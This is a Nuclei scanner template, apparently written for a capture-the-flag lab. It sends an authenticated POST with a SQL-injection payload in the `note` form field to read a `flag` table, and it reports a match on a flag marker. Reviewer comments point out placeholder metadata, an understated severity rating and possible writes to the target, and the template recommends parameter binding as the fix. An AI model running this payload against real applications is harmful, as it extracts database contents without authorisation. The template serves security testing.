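# Nuclei template: sends one authenticated POST with a SQL-injection probe in
# the `note` form field and reports a match only when the response is HTTP 200
# and its body contains the flag marker.
id: flag-extraction

info:
  name: Flag Extraction via SQL Injection
  # NOTE(review): `author` and `reference` still hold scaffold placeholders.
  author: your-name
  # NOTE(review): a match means table contents were returned in the response,
  # which `info` understates for triage. Confirm the intended rating.
  severity: info
  description: This template performs a SQL injection to extract the flag from the application.
  remediation: >-
    Pass the note value to the database as a bound parameter instead of
    concatenating it into the SQL statement.
  reference:
    - https://your-reference-link
  tags: sqli,flag

# `requests:` is the legacy key for HTTP requests; newer nuclei releases
# spell it `http:`.
requests:
  - method: POST
    path:
      - "{{BaseURL}}/"
    headers:
      User-Agent: "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
      Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
      Accept-Language: "en-US,en;q=0.5"
      Accept-Encoding: "gzip, deflate, br"
      Content-Type: "application/x-www-form-urlencoded"
      # NOTE(review): an Origin value is scheme://host[:port] only, while
      # {{BaseURL}} is the target URL as supplied, including any path.
      # {{RootURL}} is the nuclei variable without the path.
      Origin: "{{BaseURL}}"
      # `cookie` is not defined in this template, so it has to be supplied at
      # run time (e.g. `-var cookie=<session value>`). Keeping the session
      # value out of the file keeps it out of version control.
      Cookie: "session={{cookie}}"
      Upgrade-Insecure-Requests: "1"
    # Probe for the `note` field, kept as the author wrote it. A match
    # indicates the field reaches the SQL statement without parameter binding.
    # NOTE(review): presumably this form stores the note, so each run may
    # write a row to the target. Confirm against the application.
    body: "note=AppSec' || (select * from flag)) --"
    # Both matchers must hold for a result to be reported.
    matchers-condition: and
    matchers:
      # Presumably the flag prefix used by the target lab (TODO confirm).
      - type: word
        part: body
        words:
          - "FlagY"
      - type: status
        status:
          - 200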